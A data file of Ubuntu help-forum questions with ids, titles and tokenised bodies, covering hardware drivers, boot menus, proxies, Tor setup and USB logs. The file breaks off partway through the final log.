348740	iball clarotv model t18 usb tv/fm tuner stick on ubuntu 13.10	my ubuntu version : 13.10 , linux image : 3.12.0-7 recently , i got a usb tv/fm tuner stick . it is working on windows 7 , but i need it in my ubuntu , i tried most of the ways found on the web & linuxtv to make it work , also , i tried to build_essentials script from linuxtv . still no luck . : ( i tried vlc , my-tv , kaffeine , gnomeradio etc , i know the problem is because of drivers , not the application . i do n't want to move to windows just to watch it . iball says , it has no official support for linux/opensource . thanks in advance . product info : iball clarotv model t18 lusb says , bus 002 device 004 : id 1b80 : d424 afatech dmesg says [ 17524.829755 ] usb 2-1.5 : new high-speed usb device number 12 using ehci-pci [ 17524.924981 ] usb 2-1.5 : new usb device found , idvendor=1b80 , idproduct=d424 [ 17524.924986 ] usb 2-1.5 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 17524.924990 ] usb 2-1.5 : product : polaris av capture [ 17524.924994 ] usb 2-1.5 : manufacturer : conexant corporation [ 17524.924997 ] usb 2-1.5 : serialnumber : 0000000 //output of $ lsusb -v -d 1b80 : d424 bus 002 device 012 : id 1b80 : d424 afatech could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 239 miscellaneous device bdevicesubclass 2 ? bdeviceprotocol 1 interface association bmaxpacketsize0 64 idvendor 0x1b80 afatech idproduct 0xd424 bcddevice 40.01 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 344 bnuminterfaces 7 bconfigurationvalue 1 iconfiguration 4 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 32 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x8e ep 14 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0020 1x 32 bytes binterval 4 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x0e ep 14 out bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0020 1x 32 bytes binterval 4 interface association : blength 8 bdescriptortype 11 bfirstinterface 1 binterfacecount 6 bfunctionclass 255 vendor specific class bfunctionsubclass 255 vendor specific subclass bfunctionprotocol 255 vendor specific protocol ifunction 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 7 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x8f ep 15 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 7 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 0 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 8 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 1 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 9 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 2 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 10 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0080 1x 128 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 3 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 11 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x013c 1x 316 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 4 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 12 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x02c8 1x 712 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 5 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 13 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0ac8 2x 712 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 3 balternatesetting 0 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 20 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 3 balternatesetting 1 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 21 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x001c 1x 28 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 3 balternatesetting 2 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 22 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0034 1x 52 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 4 balternatesetting 0 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 23 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 4 balternatesetting 1 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 24 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x00b8 1x 184 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 4 balternatesetting 2 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 25 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x02d8 1x 728 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 4 balternatesetting 3 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 26 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x13c4 3x 964 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 4 balternatesetting 4 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 27 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0b84 2x 900 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 5 balternatesetting 0 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 28 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x85 ep 5 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 5 balternatesetting 1 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 31 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x05 ep 5 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 6 balternatesetting 0 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 29 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x86 ep 6 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 6 balternatesetting 1 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 30 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x86 ep 6 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0240 1x 576 bytes binterval 1
348741	reinstalling ubuntu through wubi not working	last night i was having a problem with reinstalling ubuntu through wubi on a pc , i had installed it first , and booted into it after the installer was done , through an automatic reboot into ubuntu option , it worked fine , but after few minutes it just froze ( lack of a better processor ) so i did a hard reboot ( pressed the hardware power off button ) and went into ubuntu again and it gave me an error saying error : file could not be found and i booted into windows made sure everything was working , which it was , and then shut it down and booted ubuntu with the same error message , so i went into windows and uninstalled ubuntu by going to control panel , uninstall a program , and then i uninstalled ubuntu , then i ran the installer again but it says the file ubuntu in c : already exits , so i went to windows explorer and tried to remove the ubuntu file , but it kept saying that i do not have permission to use it 's contents even when i am an admin ?
348742	how can i add proxy authentication parameters for ubuntu tweak ?	i was trying to play around with ubuntu tweak , when i tried to access tweaks & rightarrow ; love wallpaper hd and encountered the following error : distribution : ubuntu 12.10 quantal application : ubuntu tweak 0.8.3-1~quantal1 desktop : ubuntu traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 498 , in _load_module page = module ( ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/tweaks/lovewallpaperhd.py '' , line 57 , in __init__ self.load_imageview ( ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/tweaks/lovewallpaperhd.py '' , line 64 , in load_imageview self.jsonman.get_json ( ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/tweaks/lovewallpaperhd.py '' , line 122 , in get_json fd = urllib2.urlopen ( json_init_url , timeout=10 ) .read ( ) .decode ( `` utf-8 '' ) file `` /usr/lib/python2.7/urllib2.py '' , line 127 , in urlopen return _opener.open ( url , data , timeout ) file `` /usr/lib/python2.7/urllib2.py '' , line 407 , in open response = meth ( req , response ) file `` /usr/lib/python2.7/urllib2.py '' , line 520 , in http_response 'http ' , request , response , code , msg , hdrs ) file `` /usr/lib/python2.7/urllib2.py '' , line 445 , in error return self._call_chain ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 379 , in _call_chain result = func ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 528 , in http_error_default raise httperror ( req.get_full_url ( ) , code , msg , hdrs , fp ) httperror : http error 407 : authenticationrequired i am behind a college proxy and need to pass authentication parameters for accessing internet . i have added the same to my ~/.bashrc file . i can update and upgrade using apt , since i have added them to my /etc/apt/apt.conf file . i see that ubuntu tweak has some proxy bugs filed on launchpad ( bug # 658449 and bug # 1101191 ) , but it seems like it is going though the proxy but not able to authenticate , since i have not given those parameters anywhere . is there anyway i can pass the username and password required to access the internet to tweak by adding them to some file ?
348744	why tor can not access /usr/bin/tor-browser/data/tor ?	i 'm getting the following error while installing tor on ubuntu 12.04 : [ warning ] /usr/bin/tor-browser/data/tor is not owned by this user ( ****** , 1000 ) but by root ( 0 ) . perhaps you are running tor as the wrong user ? [ warning ] failed to parse/validate config : could n't access/create private data directory `` /usr/bin/tor-browser/data/tor '' [ error ] reading config failed -- see warnings above . how can i fix it ?
348745	kdeinit could not launch /usr/bin/kate	i 'm running kubuntu 12.04 with kde 4.11.1 and the rootactions service menu in dolphin . i opened dolphin as root then clicked on a text file . i got a `` sorry '' dialog with the message : kdeinit could not launch /usr/bin/kate so i opened a terminal and issued this command as root : # /usr/bin/kate that worked and kate opened as expected . why is dolphin giving this error and how can i fix it ? thanks .
348746	no gui after normal update	after i finished working , i made the usual update that ubuntu every now and then ask to do . please notice is update , i 'm not upgrading the distro . after it finished , it asked for a reboot which i did . boom , it wo n't restart on graphical mode . the xfce window appears for a very short time , and then everything goes black and i get a console logging . i can not start the lightdm , it just switches session to the 7th and stands there , waiting . where can i start looking for what went wrong ? i already started to make a backup , but i really do n't want to have to resintall everything ...
348747	amd/intel hybrid graphic with amd hd 8730m	it seems ubuntu does n't support hybrid technology for graphics card . is there any solution to install amd/intel and active amd graphics card ?
348749	gparted hanged for hours on shrinking	gparted is stuck on the shrinking step for the last 25 hours trying to shrink my 442gb windows 8 oartition to 426gb . this partition is on my sata hdd and i aá¸ż only modifying the end of the partition in order to put my new ubuntu after it . should i just keep waiting or is there anything else i can do to speed up or cancel ( without data loss ) the process ? edit : gparted is still running , here 's the current state from top : 15773 - root - 20 - 0 - 454m - 25m - 19m - r - 1,7 - 0,2 - 44:14.40 gpartedbin so it looks to me it 's still doing something is n't it ? what 's worrying me ( but i 'm surely mistaken there ) is that glances does n't notice anything happening on the hdd ( in and out ) and there are those a_deny on the gpartedbin line for the columns io_r and io_w ( respectively read and write i guess ? ) .
348750	install alongside windows 8 no option	i 'm not getting the option of 'install alongside windows 8 ' and i dont want to fall into the headache of partitioning disks . i 'm booting ubuntu 13.04 via usb stick .
348756	disable cuda run time limit on kernels	i am using ubuntu 12.10 with cuda 5.5 installed on a laptop which have an optimus compatible gpu . so the displays are using the integrated intel gpu and i can use the nvidia gpu ( geforce 525m ) to run cuda programs with optirun . my question is that , how can i disable the run time limit on kernels ? ( i know the risk behind it , but this option is critical only if the displays using the nvidia gpu . )
348759	how to partition hard drive on ubuntu	dear fellows i am new to ubuntu.. i do n't know how to partition my hard drive like it is on windows.. please guide me the whole procedure to solve this issue.. i will be thankful to you .
348761	why is my asus eeepc-1225b wireless led always on even after turning wifi off ?	i have an asus eeepc-1225b running ubuntu 12.04 lts . everything seems to work fine , but the wireless led is always on , even after turning wifi off . i need some help to solve this problem . thanks .
348763	removing entries from uefi menu with efibootmgr	i would like to find out how to remove oses ( distros ) from uefi boot menu when you have entries with letters and asterisks . i 'd try it myself before asking but i 'm not too techy and fixing the mess i might cause by doing something that i do n't understand might take me ages . let 's say i want to get rid of boot000e* which is opensuse , would i type sudo efibootmgr -b e* -b ? why are there some letters ( not numbers ) and what do asterisks * mean there ? $ sudo efibootmgr bootcurrent : 0008 timeout : 2 seconds bootorder : 0008,0010,000c,0009,0006,000f,000e,000d,0007,000b boot0000 bios setup boot0001 boot menu boot0002 diagnostic screen boot0003 recovery and utility boot0004 diagnostic program boot0005 diagnostic progrogram rom boot0006* floppy disk drive : boot0007* drive0 hdd : boot0008* usb hdd : boot0009* usb cd/dvd : boot000a* erase disk boot000b* windows boot manager boot000c* ubuntu boot000d* fedora boot000e* opensuse boot000f* opensuse-secureboot boot0010* mageia
348767	how to share files between two machines in a network with a router ?	i have a notebook with ubuntu 13.04 and a desktop with debian 7.1.0 and i want to know how can i share files between the two machines , i 'm using a router and the notebook is connected to the wireless network , since the desktop is on eth0 . can someone tell me how to share files betwen the two ? because i know absolutely nothing of networks . thanks to those who respond .
348774	how to prevent crontab command line output from interfering with other text ?	i have a crontab job set for every 30 minutes and i have it so that the output is redirected to the command line . my problem is that this output is interrupting whatever it is that i have on the screen at the moment , text or other program . can anyone suggest how to prevent this ? for the record its a ubuntu server 13.04 . ( current crontab line ) */30 * * * * /usr/bin/acpi > /dev/pts/0
348777	how to add tor browser to my menu/launcher for regular use ?	i have installed tor browser following these instructions here . the `` tor browser '' thingy is not in application > internet category . i must run the shell script every time . i 'd like to use it regularly , thence i would prefer to have it in my gnome application menu , or my unity launcher . how can i have it handy at all times ?
348778	connecting ubuntu to os x open directory ( groups , users , permissions )	currently trying to set up a ubuntu box as a file server on the network . i 've got sharing down when authenticating with local groups and users within the ubuntu box however i 've got an os x server that 's providing open directory . running getent passwd shows the correct users from the os x box . my question is how do i get the os x groups to import to ubuntu . secondly how do i then allow or disallow access based on the open directory group ? thanks in advance .
348783	need drivers for a dell v525w printer	i have a dell dimension 4700 , still works fine and i do n't want to buy another computer just to avoid the windows xp shutdown . loaded ubuntu 13.04 , works great , but when i try to add my printer , my v525w is not one that is shown . contacted dell and they only have windows drivers . is there a solution ?
348784	how to have a different ip on same network access a samba server	my network ip is 192.168.20.254 i had to setup another ip range 192.168.1.x as i have a few computers that tunnel through another network . i have a separate samba server 192.168.20.201 the new ip range need to access the samba server . i have added the new ip range to samba but when i try to map it wont even allow me into samba how do i achieve this . thank you .
348787	how to install ubuntu alongside windows 8	when i try to choose as os ubuntu it writes me that somewhere in wubi is error or it is missing . how i should solve this problem ? thanks in advance for any advice .
348788	while booting ubuntu , it 's showing the starting and stopping services	while booting ubuntu , it 's showing the starting and stopping services . without logging into the os , after pressing ctrl+z , ctrl+brk , it is only showing the login screen . i do n't know how to resolve this problem .
348790	apport-retrace fails with error : report file does not contain one of the required fields	i installed an application from the developer 's website and it was crashing . i tried using this form of apport-retrace to get a report i could email to the dev myself : apport-retrace -- confirm -- gdb -- sandbox system -- verbose -- cache /my/path/cache/apport-retrace -- output /mypath/apport-retrace/appname.1000.crash /var/crash/_usr_bin_appname.1000.crash the error is : error : report file does not contain one of the required fields : coredump distrorelease package executablepath i checked the crash file and the missing field is `` package . '' however , the application does not come from a debian package . is there a way i can tell apport-retrace to ignore this field and generate the best report it can ? edit : i am not trying to report the bug to ubuntu . i 'm also not seeking to submit a bug report to any bug tracker . my goal is to read the crash report myself . that 's really my only goal . once i read the crash report in this particular case i 'll email the dev . but in general , i want a tool that will let me read the crash reports generated by the standard tools installed on ubuntu . thanks .
348791	trying to use my desktop to put out a wifi signal other devices can connect to	i could do this simply with windows and using a program called virtual router . with ubuntu i am not sure if this is possible . i have a desktop that is hard wired to the wall and gets its online connection from there . i also have a wireless card installed and working . i would like to be able to share the connection to be online from the wired connection with other devices . please help , thank you
348795	how i put ubuntu on an usb ?	i already downloaded ubuntu 13.04 32-bits , and universal usb installer , i have ubuntu on winrar as downloaded but when searching for the iso to install it to my usb doesnt appear .
348796	where to download and install wireless drive for bcm 4365 ?	hello can any one help me download and install the necessary network drivers required for my network card bcm 4365 . please provide all the details of the steps involved ! ubuntu 12.04.1 lts x86_64 and fyi this one 's not a duplicate and i want every detail information for downloading and installing the wireless driver !
348797	simple scan hp deskjet connection	how can i use scan with hp deskjet ink advantage 3516 by wireless on ubuntu 12.04
348798	use mouse wheel to middle click mouse 3 instead of switching scroll modes in ubuntu 13.04	i have a logitech mx5500 mouse and keyboard combo . when i press down on the mouse wheel it releases the scroll clicker and allows the wheel to spin freely . clicking down again on the mouse wheel turns freespin off and relocks the wheel or causes it to click with every scroll . back when i used to use windows , the logitech drivers installed a piece of software that allowed me to easily select key bindings , customize display settings on the keyboard ( which i 've never even looked at and know nothing about ; i do n't even really use the keyboard ) and most importantly an option to toggle between treating the middle mouse button as mouse3 or as a toggle between free spin and click-scrolling . i believe this software is call logitech setpoint . normally you would choose to set the binding on the mouse wheel and change it from 'shift scroll modes ' to 'middle button ' but logitech does n't provide any linux support . upon doing some research i discovered a piece of software called hidpoint designed to emulate setpoint for linux systems but it seems to have not been updated or supported in the last couple years as it lists the latest supported version of ubuntu as 10.10 . i tried to install it was but not successful . from what i can tell it looks like this project has been abandoned . such a shame considering how useful it would be . i could n't find any online documentation regarding this issue however i did find some about setting custom mouse bindings . one guide using imwheel outlined here : https : //help.ubuntu.com/community/manybuttonsmousehowto was kind of confusing regarding how i would be able to know which commands carried out which tasks . also i got errors trying to run imwheel . this guide made a little more sense : how to configure extra buttons in logitech mouse and i was able to use it to figure out my mouse bindings but i was again at a loss for how to figure out what commands or scripts to bind to which key . ========================================= on a side note ========================================= is there an application similar to xev that displays a command output for an action done ? this way someone could obtain the action they want to bind to a script as easily as the mouse binding . for example : using xev i click each button on my mouse to see which binding it has . if i want to bind a mouse button to ctrl i would add : '' xte 'key control_l ' '' b:1 to my .xbindkeysrc file or if i wanted to bind a key to switch workplaces ( in kde , copied from another tutorial ) i would add : '' qdbus org.kde.kwin /kwin org.kde.kwin.previousdesktop '' b:6 '' qdbus org.kde.kwin /kwin org.kde.kwin.nextdesktop '' b:7 but the people who wrote those tutorials knew those commands or were able to figure them out in some way . say b:6 and b:7 are my forward and backward mouse buttons and i wanted to bind them to previous track and next track in vlc . is there a program like xev where i could have it running and then with vlc open , when i press the next button in vlc it outputs a command to the terminal that was delivered to vlc ? that way one could copy the command from the terminal to .xbindkeysrc so far as i can tell , the best solution alluded to here : http : //blog.hanschen.org/2009/10/13/mouse-shortcuts-with-xbindkeys/ is to set up a keyboard shortcut in whatever program you want to use and then bind a mouse button to a combination of keyboard keys . is this the best working solution for people who are doing custom mouse bindings ? there seems to be very little interest and support for custom mouse bindings in linux and ubuntu which seems especially weird to me . i would think this to be a much more popular issue which leads me to believe there is some sort of documentation surrounding this that i have n't seen that clarifies everything or makes everything easier . as of right now , i understand how to set custom mouse bindings but have no idea how one would figure out what to bind the mouse button to . the logitech setpoint software made this as easy as selecting buttons then selecting applications and specific functions ( like media player > next track or media player > previous track for the previously mentioned track skipping in vlc ) . ===================================== end of side note ===================================== sadly this whole key binding thing does n't even help me any closer to solving my issue because clicking on my mouse wheel in xev returns absolutely no output . all the other buttons give output along with moving the mouse or the wheels . wheel up is registering button 4 and wheel down button 5 but clicking on the wheel just switches the scrolling mode but does n't do anything in xev . so i thought i might be able to find the command for mouse3 or middle click and bind that to ... b:3 ( i guess ? ) but i imagine that might not even work since i do n't have a mouse binding for my mouse wheel . i remember when i first install ubuntu 12.10 from windows 7 , i had the mouse drivers installed in windows 7 and set the mouse wheel binding to the middle button . i then erased windows 7 and installed ubuntu 12.10 and the mouse was the same . after a re-installation of 12.10 ( or it may have been an upgrade to 13.04 ) my mouse wheel went back to switching scroll modes . every subsequent installation has resulted in the same configuration and i have not been able to resolve it since . my computer knowledge tells me this has something to do with some read-only memory in the mouse itself i.e. , a switch that gets turned on/off by a command from the computer . i imagine the switch was turned off by the drivers in windows ( turning the wheel back to a middle click as opposed to a scroll mode switcher ) and maybe reset at some point during a ubuntu installation . i guess i would be looking for some sort of command to send a message to the mouse to flip the switch ? any help would be appreciated . i 'm not really sure how to go about trying to fix this and i 've exhausted all my internet searching abilities . i ca n't seem to find any way to set my mouse wheel back to a middle click instead of switching scroll modes . thanks .
348801	13.04 : spontaneous full usb disconnect and reconnect	environment : dell xps 15 ( l502x ) , ubuntu 13.04 symptoms : sporadically , the entire roster of usb devices is disconnected and reconnected . the /var/log/syslog entries are : sep 22 14:02:36 xps-l502x kernel : [ 25480.709993 ] usb 3-2.1 : usb disconnect , device number 16 sep 22 14:02:36 xps-l502x kernel : [ 25480.710006 ] usb 3-2.1.2 : usb disconnect , device number 17 sep 22 14:02:36 xps-l502x kernel : [ 25480.710013 ] usb 3-2.1.2.1 : usb disconnect , device number 18 sep 22 14:02:36 xps-l502x kernel : [ 25480.729436 ] usb 3-2.1.2.2 : usb disconnect , device number 19 sep 22 14:02:36 xps-l502x kernel : [ 25480.782935 ] usb 3-2.1.2.3 : usb disconnect , device number 20 sep 22 14:02:36 xps-l502x kernel : [ 25480.786629 ] usb 3-2.1.2.4 : usb disconnect , device number 21 sep 22 14:02:36 xps-l502x colord : device removed : sysfs-samsung-galaxy_nexus sep 22 14:02:36 xps-l502x kernel : [ 25480.999078 ] usb 3-2.1 : new high-speed usb device number 22 using xhci_hcd sep 22 14:02:36 xps-l502x kernel : [ 25481.017320 ] usb 3-2.1 : new usb device found , idvendor=2109 , idproduct=2812 sep 22 14:02:36 xps-l502x kernel : [ 25481.017331 ] usb 3-2.1 : new usb device strings : mfr=0 , product=1 , serialnumber=0 sep 22 14:02:36 xps-l502x kernel : [ 25481.017336 ] usb 3-2.1 : product : usb2.0 hub sep 22 14:02:36 xps-l502x kernel : [ 25481.018366 ] hub 3-2.1:1.0 : usb hub found sep 22 14:02:36 xps-l502x kernel : [ 25481.018837 ] hub 3-2.1:1.0 : 4 ports detected sep 22 14:02:37 xps-l502x kernel : [ 25481.310998 ] usb 3-2.1.2 : new high-speed usb device number 23 using xhci_hcd sep 22 14:02:37 xps-l502x kernel : [ 25481.328937 ] usb 3-2.1.2 : new usb device found , idvendor=1a40 , idproduct=0201 sep 22 14:02:37 xps-l502x kernel : [ 25481.328948 ] usb 3-2.1.2 : new usb device strings : mfr=0 , product=1 , serialnumber=0 sep 22 14:02:37 xps-l502x kernel : [ 25481.328953 ] usb 3-2.1.2 : product : usb 2.0 hub [ mtt ] sep 22 14:02:37 xps-l502x kernel : [ 25481.329845 ] hub 3-2.1.2:1.0 : usb hub found sep 22 14:02:37 xps-l502x kernel : [ 25481.330265 ] hub 3-2.1.2:1.0 : 7 ports detected sep 22 14:02:37 xps-l502x kernel : [ 25481.602906 ] usb 3-2.1.2.1 : new low-speed usb device number 24 using xhci_hcd sep 22 14:02:37 xps-l502x kernel : [ 25481.631411 ] usb 3-2.1.2.1 : new usb device found , idvendor=1a7c , idproduct=0068 sep 22 14:02:37 xps-l502x kernel : [ 25481.631421 ] usb 3-2.1.2.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 sep 22 14:02:37 xps-l502x kernel : [ 25481.631427 ] usb 3-2.1.2.1 : product : evoluent verticalmouse 3 sep 22 14:02:37 xps-l502x kernel : [ 25481.631432 ] usb 3-2.1.2.1 : manufacturer : kingsis peripherals sep 22 14:02:37 xps-l502x kernel : [ 25481.640362 ] input : kingsis peripherals evoluent verticalmouse 3 as /devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-2/3-2.1/3-2.1.2/3-2.1.2.1/3-2.1.2.1:1.0/input/input148 sep 22 14:02:37 xps-l502x kernel : [ 25481.640765 ] hid-generic 0003:1a7c:0068.0088 : input , hidraw0 : usb hid v1.10 mouse [ kingsis peripherals evoluent verticalmouse 3 ] on usb-0000:04:00.0-2.1.2.1/input0 sep 22 14:02:37 xps-l502x kernel : [ 25481.710675 ] usb 3-2.1.2.2 : new low-speed usb device number 25 using xhci_hcd sep 22 14:02:37 xps-l502x kernel : [ 25481.764044 ] usb 3-2.1.2.2 : new usb device found , idvendor=04f2 , idproduct=0402 sep 22 14:02:37 xps-l502x kernel : [ 25481.764050 ] usb 3-2.1.2.2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 sep 22 14:02:37 xps-l502x kernel : [ 25481.764052 ] usb 3-2.1.2.2 : product : usb keyboard sep 22 14:02:37 xps-l502x kernel : [ 25481.764055 ] usb 3-2.1.2.2 : manufacturer : chicony sep 22 14:02:37 xps-l502x kernel : [ 25481.764226 ] usb 3-2.1.2.2 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes sep 22 14:02:37 xps-l502x kernel : [ 25481.764234 ] usb 3-2.1.2.2 : ep 0x82 - rounding interval to 64 microframes , ep desc says 80 microframes sep 22 14:02:37 xps-l502x kernel : [ 25481.781398 ] input : chicony usb keyboard as /devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-2/3-2.1/3-2.1.2/3-2.1.2.2/3-2.1.2.2:1.0/input/input149 sep 22 14:02:37 xps-l502x kernel : [ 25481.781654 ] hid-generic 0003:04f2:0402.0089 : input , hidraw1 : usb hid v1.11 keyboard [ chicony usb keyboard ] on usb-0000:04:00.0-2.1.2.2/input0 sep 22 14:02:37 xps-l502x kernel : [ 25481.822268 ] input : chicony usb keyboard as /devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-2/3-2.1/3-2.1.2/3-2.1.2.2/3-2.1.2.2:1.1/input/input150 sep 22 14:02:37 xps-l502x kernel : [ 25481.822537 ] hid-generic 0003:04f2:0402.008a : input , hiddev0 , hidraw2 : usb hid v1.11 device [ chicony usb keyboard ] on usb-0000:04:00.0-2.1.2.2/input1 sep 22 14:02:37 xps-l502x kernel : [ 25481.894854 ] usb 3-2.1.2.3 : new high-speed usb device number 26 using xhci_hcd sep 22 14:02:37 xps-l502x kernel : [ 25482.015691 ] usb 3-2.1.2.3 : new usb device found , 